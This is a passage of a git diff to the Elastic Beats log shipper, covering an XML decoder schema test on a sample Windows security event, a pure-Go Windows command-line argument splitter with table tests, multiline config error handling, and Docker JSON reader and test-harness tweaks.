(common.MapStr, error) { + evt, err := winevent.UnmarshalXML(p) + if err != nil { + return nil, err + } + return evt.Fields(), nil + } +} diff --git a/libbeat/processors/decode_xml/schema_test.go b/libbeat/processors/decode_xml/schema_test.go new file mode 100644 index 00000000000..655c5156fe2 --- /dev/null +++ b/libbeat/processors/decode_xml/schema_test.go @@ -0,0 +1,130 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" +) + +func TestDecodeSchemas(t *testing.T) { + var testCases = []struct { + schema string + config decodeXMLConfig + Input common.MapStr + Output common.MapStr + error bool + errorMessage string + }{ + { + schema: wineventlogSchema, + config: decodeXMLConfig{ + Field: "message", + Target: &testXMLTargetField, + Schema: wineventlogSchema, + }, + Input: common.MapStr{ + "message": "" + + "4672001254800x8020000000000000" + + "11303Securityvagrant" + + "S-1-5-18SYSTEMNT AUTHORITY0x3e7" + + "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\t" + + "SeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege" + + "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\n" + + "Privileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\t" + + "SeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformation" + + "Special LogonInfoSecurityMicrosoft Windows security auditing.Audit Success", + }, + Output: common.MapStr{ + "xml": common.MapStr{ + "channel": "Security", + "outcome": "success", + "activity_id": "{ffb23523-1f32-0000-c335-b2ff321fd701}", + "level": "information", + "event_id": uint32(4672), + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": uint64(11303), + "computer_name": "vagrant", + "time_created": func() time.Time { + t, _ := time.Parse(time.RFC3339Nano, "2021-03-23T09:56:13.137310000Z") + return t + }(), + "opcode": "Info", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "event_data": common.MapStr{ + "SubjectUserSid": "S-1-5-18", + "SubjectUserName": "SYSTEM", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e7", + "PrivilegeList": "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + }, + "task": "Special Logon", + "keywords": []string{ + "Audit Success", + }, + "message": "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "process": common.MapStr{ + "pid": uint32(652), + "thread": common.MapStr{ + "id": uint32(4660), + }, + }, + }, + "message": "" + + "4672001254800x8020000000000000" + + "11303Securityvagrant" + + "S-1-5-18SYSTEMNT AUTHORITY0x3e7" + + "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\t" + + "SeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege" + + "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\n" + + "Privileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\t" + + "SeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformation" + + "Special LogonInfoSecurityMicrosoft Windows security auditing.Audit Success", + }, + }, + } + + for _, test := range testCases { + test := test + t.Run(test.schema, func(t *testing.T) { + t.Parallel() + + f, err := newDecodeXML(test.config) + require.NoError(t, err) + + event := &beat.Event{ + Fields: test.Input, + } + newEvent, err := f.Run(event) + if !test.error { + assert.NoError(t, err) + } else { + if assert.Error(t, err) { + assert.Contains(t, err.Error(), test.errorMessage) + } + } + assert.Equal(t, test.Output, newEvent.Fields) + }) + } +} diff --git a/libbeat/processors/script/javascript/module/windows/windows.go b/libbeat/processors/script/javascript/module/windows/windows.go index 2bbe7817fad..b7f306714f2 100644 --- a/libbeat/processors/script/javascript/module/windows/windows.go +++ b/libbeat/processors/script/javascript/module/windows/windows.go @@ -15,14 +15,9 @@ // specific language governing permissions and limitations // under the License. -// +build windows - package windows import ( - "syscall" - "unsafe" - "github.com/dop251/goja" "github.com/dop251/goja_nodejs/require" ) @@ -30,34 +25,73 @@ import ( // SplitCommandLine splits a string into a list of space separated arguments. // See Window's CommandLineToArgvW for more details. func SplitCommandLine(cmd string) []string { - args, err := commandLineToArgvW(cmd) - if err != nil { - panic(err) - } - - return args + return commandLineToArgv(cmd) } -func commandLineToArgvW(in string) ([]string, error) { - ptr, err := syscall.UTF16PtrFromString(in) - if err != nil { - return nil, err +// appendBSBytes appends n '\\' bytes to b and returns the resulting slice. +func appendBSBytes(b []byte, n int) []byte { + for ; n > 0; n-- { + b = append(b, '\\') } + return b +} - var numArgs int32 - argsWide, err := syscall.CommandLineToArgv(ptr, &numArgs) - if err != nil { - return nil, err +// readNextArg splits command line string cmd into next +// argument and command line remainder. +func readNextArg(cmd string) (arg []byte, rest string) { + var b []byte + var inquote bool + var nslash int + for ; len(cmd) > 0; cmd = cmd[1:] { + c := cmd[0] + switch c { + case ' ', '\t': + if !inquote { + return appendBSBytes(b, nslash), cmd[1:] + } + case '"': + b = appendBSBytes(b, nslash/2) + if nslash%2 == 0 { + // use "Prior to 2008" rule from + // http://daviddeley.com/autohotkey/parameters/parameters.htm + // section 5.2 to deal with double double quotes + if inquote && len(cmd) > 1 && cmd[1] == '"' { + b = append(b, c) + cmd = cmd[1:] + } + inquote = !inquote + } else { + b = append(b, c) + } + nslash = 0 + continue + case '\\': + nslash++ + continue + } + b = appendBSBytes(b, nslash) + nslash = 0 + b = append(b, c) } + return appendBSBytes(b, nslash), "" +} - // Free memory allocated for CommandLineToArgvW arguments. - defer syscall.LocalFree((syscall.Handle)(unsafe.Pointer(argsWide))) - - args := make([]string, numArgs) - for idx := range args { - args[idx] = syscall.UTF16ToString(argsWide[idx][:]) +// commandLineToArgv splits a command line into individual argument +// strings, following the Windows conventions documented +// at http://daviddeley.com/autohotkey/parameters/parameters.htm#WINARGV +// Original implementation found at: https://github.com/golang/go/commit/39c8d2b7faed06b0e91a1ad7906231f53aab45d1 +func commandLineToArgv(cmd string) []string { + var args []string + for len(cmd) > 0 { + if cmd[0] == ' ' || cmd[0] == '\t' { + cmd = cmd[1:] + continue + } + var arg []byte + arg, cmd = readNextArg(cmd) + args = append(args, string(arg)) } - return args, nil + return args } // Require registers the windows module that has utilities specific to diff --git a/libbeat/processors/script/javascript/module/windows/windows_test.go b/libbeat/processors/script/javascript/module/windows/windows_test.go index be213a79ba8..63f55f54fc7 100644 --- a/libbeat/processors/script/javascript/module/windows/windows_test.go +++ b/libbeat/processors/script/javascript/module/windows/windows_test.go @@ -15,8 +15,6 @@ // specific language governing permissions and limitations // under the License. -// +build windows - package windows import ( @@ -25,33 +23,118 @@ import ( "github.com/stretchr/testify/assert" ) -const quotedCommandLine = `"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=en_US" "-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache" "-steampid=796" "-buildid=1546909276" "-steamid=0" "-steamuniverse=Dev" "-clientui=C:\Program Files (x86)\Steam\clientui" --disable-spell-checking --disable-out-of-process-pac --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents --enable-media-stream --disable-smooth-scrolling --num-raster-threads=4 --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt"` - -func TestSplitCommandLine(t *testing.T) { - args := SplitCommandLine(quotedCommandLine) - - for _, a := range args { - t.Log(a) +func TestCommandLineToArgv(t *testing.T) { + cases := []struct { + cmd string + args []string + }{ + { + cmd: ``, + args: nil, + }, + { + cmd: ` `, + args: nil, + }, + { + cmd: "\t", + args: nil, + }, + { + cmd: `test`, + args: []string{`test`}, + }, + { + cmd: `test a b c`, + args: []string{`test`, `a`, `b`, `c`}, + }, + { + cmd: `test "`, + args: []string{`test`, ``}, + }, + { + cmd: `test ""`, + args: []string{`test`, ``}, + }, + { + cmd: `test """`, + args: []string{`test`, `"`}, + }, + { + cmd: `test "" a`, + args: []string{`test`, ``, `a`}, + }, + { + cmd: `test "123"`, + args: []string{`test`, `123`}, + }, + { + cmd: `test \"123\"`, + args: []string{`test`, `"123"`}, + }, + { + cmd: `test \"123 456\"`, + args: []string{`test`, `"123`, `456"`}, + }, + { + cmd: `test \\"`, + args: []string{`test`, `\`}, + }, + { + cmd: `test \\\"`, + args: []string{`test`, `\"`}, + }, + { + cmd: `test \\\\\"`, + args: []string{`test`, `\\"`}, + }, + { + cmd: `test \\\"x`, + args: []string{`test`, `\"x`}, + }, + { + cmd: `test """"\""\\\"`, + args: []string{`test`, `""\"`}, + }, + { + cmd: `"cmd line" abc`, + args: []string{`cmd line`, `abc`}, + }, + { + cmd: `test \\\\\""x"""y z`, + args: []string{`test`, `\\"x"y z`}, + }, + { + cmd: "test\tb\t\"x\ty\"", + args: []string{`test`, `b`, "x\ty"}, + }, + { + cmd: `"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=en_US" "-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache" "-steampid=796" "-buildid=1546909276" "-steamid=0" "-steamuniverse=Dev" "-clientui=C:\Program Files (x86)\Steam\clientui" --disable-spell-checking --disable-out-of-process-pac --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents --enable-media-stream --disable-smooth-scrolling --num-raster-threads=4 --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt"`, + args: []string{ + `C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe`, + `-lang=en_US`, + `-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache`, + `-steampid=796`, + `-buildid=1546909276`, + `-steamid=0`, + `-steamuniverse=Dev`, + `-clientui=C:\Program Files (x86)\Steam\clientui`, + `--disable-spell-checking`, + `--disable-out-of-process-pac`, + `--enable-blink-features=ResizeObserver,Worklet,AudioWorklet`, + `--disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents`, + `--enable-media-stream`, + `--disable-smooth-scrolling`, + `--num-raster-threads=4`, + `--enable-direct-write`, + `--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt`, + }, + }, } - expected := []string{ - `C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe`, - `-lang=en_US`, - `-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache`, - `-steampid=796`, - `-buildid=1546909276`, - `-steamid=0`, - `-steamuniverse=Dev`, - `-clientui=C:\Program Files (x86)\Steam\clientui`, - `--disable-spell-checking`, - `--disable-out-of-process-pac`, - `--enable-blink-features=ResizeObserver,Worklet,AudioWorklet`, - `--disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents`, - `--enable-media-stream`, - `--disable-smooth-scrolling`, - `--num-raster-threads=4`, - `--enable-direct-write`, - `--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt`, + for _, tc := range cases { + t.Run(tc.cmd, func(t *testing.T) { + assert.Equal(t, tc.args, SplitCommandLine(tc.cmd)) + }) } - assert.Equal(t, expected, args) } diff --git a/libbeat/processors/translate_sid/translatesid.go b/libbeat/processors/translate_sid/translatesid.go index f794019d78e..5a7cfcf5fb7 100644 --- a/libbeat/processors/translate_sid/translatesid.go +++ b/libbeat/processors/translate_sid/translatesid.go @@ -32,7 +32,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/processors" jsprocessor "github.com/elastic/beats/v7/libbeat/processors/script/javascript/module/processor" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) const logName = "processor.translate_sid" @@ -117,7 +117,7 @@ func (p *processor) translateSID(event *beat.Event) error { } } if p.AccountTypeTarget != "" { - if _, err = event.PutValue(p.AccountTypeTarget, sys.SIDType(accountType).String()); err != nil { + if _, err = event.PutValue(p.AccountTypeTarget, winevent.SIDType(accountType).String()); err != nil { errs = append(errs, err) } } diff --git a/libbeat/processors/translate_sid/translatesid_test.go b/libbeat/processors/translate_sid/translatesid_test.go index 529f90b065f..bd9ba9e1404 100644 --- a/libbeat/processors/translate_sid/translatesid_test.go +++ b/libbeat/processors/translate_sid/translatesid_test.go @@ -29,21 +29,21 @@ import ( "golang.org/x/sys/windows" "github.com/elastic/beats/v7/libbeat/beat" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) func TestTranslateSID(t *testing.T) { var tests = []struct { SID string Account string - AccountType sys.SIDType + AccountType winevent.SIDType Domain string Assert func(*testing.T, *beat.Event, error) }{ {SID: "S-1-5-7", Domain: "NT AUTHORITY", Account: "ANONYMOUS LOGON"}, {SID: "S-1-0-0", Account: "NULL SID"}, {SID: "S-1-1-0", Account: "Everyone"}, - {SID: "S-1-5-32-544", Domain: "BUILTIN", Account: "Administrators", AccountType: sys.SidTypeAlias}, + {SID: "S-1-5-32-544", Domain: "BUILTIN", Account: "Administrators", AccountType: winevent.SidTypeAlias}, {SID: "S-1-5-113", Domain: "NT AUTHORITY", Account: "Local Account"}, {SID: "", Assert: assertInvalidSID}, {SID: "Not a SID", Assert: assertInvalidSID}, diff --git a/libbeat/reader/multiline/multiline_config.go b/libbeat/reader/multiline/multiline_config.go index b2f54eb92c7..d8b63b107e3 100644 --- a/libbeat/reader/multiline/multiline_config.go +++ b/libbeat/reader/multiline/multiline_config.go @@ -18,6 +18,7 @@ package multiline import ( + "errors" "fmt" "time" @@ -42,6 +43,9 @@ var ( countStr: countMode, whilePatternStr: whilePatternMode, } + + ErrMissingPattern = errors.New("multiline.pattern cannot be empty when pattern based matching is selected") + ErrMissingCount = errors.New("multiline.pattern cannot be empty when pattern based matching is selected") ) // Config holds the options of multiline readers. @@ -66,15 +70,15 @@ func (c *Config) Validate() error { return fmt.Errorf("unknown matcher type: %s", c.Match) } if c.Pattern == nil { - return fmt.Errorf("multiline.pattern cannot be empty when pattern based matching is selected") + return ErrMissingPattern } } else if c.Type == countMode { if c.LinesCount == 0 { - return fmt.Errorf("multiline.count_lines cannot be zero when count based is selected") + return ErrMissingCount } } else if c.Type == whilePatternMode { if c.Pattern == nil { - return fmt.Errorf("multiline.pattern cannot be empty when pattern based matching is selected") + return ErrMissingPattern } } return nil diff --git a/libbeat/reader/multiline/multiline_config_test.go b/libbeat/reader/multiline/multiline_config_test.go new file mode 100644 index 00000000000..4120faf2824 --- /dev/null +++ b/libbeat/reader/multiline/multiline_config_test.go @@ -0,0 +1,106 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package multiline + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/common" +) + +func TestInvalidConfiguration(t *testing.T) { + testcases := map[string]struct { + config map[string]interface{} + expectedError error + }{ + "missing multiline pattern": { + config: map[string]interface{}{ + "match": "before", + }, + expectedError: ErrMissingPattern, + }, + "unknown multiline mode": { + config: map[string]interface{}{ + "type": "no_such_mode", + }, + expectedError: fmt.Errorf("unknown multiline type: no_such_mode"), + }, + "missing multiline count": { + config: map[string]interface{}{ + "type": "count", + }, + expectedError: ErrMissingCount, + }, + "missing multiline pattern when while_pattern type is selected": { + config: map[string]interface{}{ + "type": "while_pattern", + }, + expectedError: ErrMissingPattern, + }, + } + + for name, test := range testcases { + test := test + t.Run(name, func(t *testing.T) { + var config Config + c := common.MustNewConfigFrom(test.config) + err := c.Unpack(&config) + require.NotNil(t, err) + require.Contains(t, err.Error(), test.expectedError.Error()) + }) + } +} + +func TestValidConfiguration(t *testing.T) { + testcases := map[string]struct { + config map[string]interface{} + }{ + "correct pattern based multiline": { + config: map[string]interface{}{ + "type": "pattern", + "match": "before", + "pattern": "^\n", + }, + }, + "correct while_pattern based multiline": { + config: map[string]interface{}{ + "type": "while_pattern", + "pattern": "^\n", + }, + }, + "correct count based multiline": { + config: map[string]interface{}{ + "type": "count", + "count_lines": 5, + }, + }, + } + + for name, test := range testcases { + test := test + t.Run(name, func(t *testing.T) { + var config Config + c := common.MustNewConfigFrom(test.config) + err := c.Unpack(&config) + require.Nil(t, err) + }) + } +} diff --git a/libbeat/reader/reader.go b/libbeat/reader/reader.go index 81ae4ad8241..43c389ac7c6 100644 --- a/libbeat/reader/reader.go +++ b/libbeat/reader/reader.go @@ -18,7 +18,6 @@ package reader import ( - "errors" "io" ) @@ -30,8 +29,3 @@ type Reader interface { io.Closer Next() (Message, error) } - -var ( - //ErrLineUnparsable is error thrown when Next() element from input is corrupted and can not be parsed - ErrLineUnparsable = errors.New("line is unparsable") -) diff --git a/libbeat/reader/readjson/docker_json.go b/libbeat/reader/readjson/docker_json.go index 59dded97ec3..d57c61c6a26 100644 --- a/libbeat/reader/readjson/docker_json.go +++ b/libbeat/reader/readjson/docker_json.go @@ -202,7 +202,7 @@ func (p *DockerJSONReader) Next() (reader.Message, error) { err = p.parseLine(&message, &logLine) if err != nil { p.logger.Errorf("Parse line error: %v", err) - return message, reader.ErrLineUnparsable + continue } // Handle multiline messages, join partial lines @@ -219,7 +219,7 @@ func (p *DockerJSONReader) Next() (reader.Message, error) { err = p.parseLine(&next, &logLine) if err != nil { p.logger.Errorf("Parse line error: %v", err) - return message, reader.ErrLineUnparsable + continue } message.Content = append(message.Content, next.Content...) } diff --git a/libbeat/reader/readjson/docker_json_test.go b/libbeat/reader/readjson/docker_json_test.go index 2c9e2e71104..de03b87da81 100644 --- a/libbeat/reader/readjson/docker_json_test.go +++ b/libbeat/reader/readjson/docker_json_test.go @@ -18,6 +18,7 @@ package readjson import ( + "io" "testing" "time" @@ -53,7 +54,7 @@ func TestDockerJSON(t *testing.T) { name: "Wrong JSON", input: [][]byte{[]byte(`this is not JSON`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 16, }, @@ -73,7 +74,7 @@ func TestDockerJSON(t *testing.T) { name: "Wrong CRI", input: [][]byte{[]byte(`2017-09-12T22:32:21.212861448Z stdout`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 37, }, @@ -82,7 +83,7 @@ func TestDockerJSON(t *testing.T) { name: "Wrong CRI", input: [][]byte{[]byte(`{this is not JSON nor CRI`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 25, }, @@ -91,7 +92,7 @@ func TestDockerJSON(t *testing.T) { name: "Missing time", input: [][]byte{[]byte(`{"log":"1:M 09 Nov 13:27:36.276 # User requested shutdown...\n","stream":"stdout"}`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 82, }, @@ -218,7 +219,7 @@ func TestDockerJSON(t *testing.T) { input: [][]byte{[]byte(`{"log":"1:M 09 Nov 13:27:36.276 # User requested shutdown...\n","stream":"stdout"}`)}, stream: "all", format: "cri", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 82, }, @@ -228,7 +229,7 @@ func TestDockerJSON(t *testing.T) { input: [][]byte{[]byte(`2017-09-12T22:32:21.212861448Z stdout 2017-09-12 22:32:21.212 [INFO][88] table.go 710: Invalidating dataplane cache`)}, stream: "all", format: "docker", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 115, }, @@ -300,7 +301,7 @@ func TestDockerJSON(t *testing.T) { []byte(`{"log":"shutdown...\n","stream`), }, stream: "stdout", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 139, }, @@ -324,11 +325,25 @@ func TestDockerJSON(t *testing.T) { name: "Corrupted log message line", input: [][]byte{[]byte(`36.276 # User requested shutdown...\n","stream":"stdout","time":"2017-11-09T13:27:36.277747246Z"}`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 97, }, }, + { + name: "Corrupted log message line is skipped, keep correct bytes count", + input: [][]byte{ + []byte(`36.276 # User requested shutdown...\n","stream":"stdout","time":"2017-11-09T13:27:36.277747246Z"}`), + []byte(`{"log":"1:M 09 Nov 13:27:36.276 # User requested","stream":"stdout","time":"2017-11-09T13:27:36.277747246Z"}`), + }, + stream: "all", + expectedMessage: reader.Message{ + Content: []byte("1:M 09 Nov 13:27:36.276 # User requested"), + Fields: common.MapStr{"stream": "stdout"}, + Ts: time.Date(2017, 11, 9, 13, 27, 36, 277747246, time.UTC), + Bytes: 205, + }, + }, } for _, test := range tests { @@ -358,6 +373,12 @@ type mockReader struct { } func (m *mockReader) Next() (reader.Message, error) { + if len(m.messages) < 1 { + return reader.Message{ + Content: []byte{}, + Bytes: 0, + }, io.EOF + } message := m.messages[0] m.messages = m.messages[1:] return reader.Message{ diff --git a/libbeat/scripts/Makefile b/libbeat/scripts/Makefile index 9598cdd7876..e863d1dacb2 100755 --- a/libbeat/scripts/Makefile +++ b/libbeat/scripts/Makefile @@ -10,7 +10,7 @@ BEAT_PATH?=${BEATS_ROOT}/${BEAT_NAME} BEAT_IMPORT_PATH?=${BEATS_ROOT_IMPORT_PATH}/${BEAT_FULL_NAME} BEAT_PACKAGE_NAME?=${BEAT_NAME} BEAT_INDEX_PREFIX?=${BEAT_NAME} -BEAT_URL?=https://www.elastic.co/products/beats/${BEAT_NAME} ## @packaging Link to the homepage of the application +BEAT_URL?=https://www.elastic.co/beats/${BEAT_NAME} ## @packaging Link to the homepage of the application BEAT_DOC_URL?=https://www.elastic.co/guide/en/beats/${BEAT_NAME}/current/index.html ## @packaging Link to the user documentation of the application BEAT_LICENSE?=ASL 2.0 ## @packaging Software license of the application BEAT_VENDOR?=Elastic ## @packaging Name of the vendor of the application @@ -270,6 +270,7 @@ load-tests: ## @testing Runs load tests # Sets up the virtual python environment .PHONY: python-env +python-env: export CRYPTOGRAPHY_DONT_BUILD_RUST=1 python-env: ${ES_BEATS}/libbeat/tests/system/requirements.txt @test -e ${PYTHON_ENV}/bin/activate || ${PYTHON_EXE} -m venv ${VENV_PARAMS} ${PYTHON_ENV} @. ${PYTHON_ENV}/bin/activate && pip install ${PIP_INSTALL_PARAMS} -q --upgrade pip ; \ diff --git a/libbeat/tests/compose/compose.go b/libbeat/tests/compose/compose.go index d9ae77256fe..8588dcb19cd 100644 --- a/libbeat/tests/compose/compose.go +++ b/libbeat/tests/compose/compose.go @@ -112,7 +112,7 @@ func EnsureUp(t testing.TB, service string, options ...UpOption) HostInfo { // Get host information host, err := compose.HostInformation(service) if err != nil { - t.Fatalf("getting host for %s", service) + t.Fatalf("getting host for %s: %v", service, err) } return host diff --git a/libbeat/tests/system/test_ilm.py b/libbeat/tests/system/test_ilm.py index 2913893e11c..12c79fad61d 100644 --- a/libbeat/tests/system/test_ilm.py +++ b/libbeat/tests/system/test_ilm.py @@ -3,6 +3,7 @@ import logging import os import pytest +import re import shutil import unittest @@ -12,6 +13,9 @@ INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False) +MSG_ILM_POLICY_LOADED = re.compile('ILM policy .* successfully created.') + + class TestRunILM(BaseTest): def setUp(self): @@ -46,7 +50,7 @@ def test_ilm_default(self): self.render_config() proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -84,7 +88,7 @@ def test_policy_name(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -103,7 +107,7 @@ def test_rollover_alias(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -123,7 +127,7 @@ def test_pattern(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -143,7 +147,7 @@ def test_pattern_date(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -286,12 +290,12 @@ def setUp(self): self.cmd = "ilm-policy" def assert_log_contains_policy(self): - assert self.log_contains('ILM policy successfully loaded.') + assert self.log_contains(MSG_ILM_POLICY_LOADED) assert self.log_contains('"max_age": "30d"') assert self.log_contains('"max_size": "50gb"') def assert_log_contains_write_alias(self): - assert self.log_contains('Write alias successfully generated.') + assert self.log_contains(re.compile('Index Alias .* successfully created.')) def test_default(self): """ diff --git a/metricbeat/Dockerfile b/metricbeat/Dockerfile index 61805ca85c0..a0e3559f514 100644 --- a/metricbeat/Dockerfile +++ 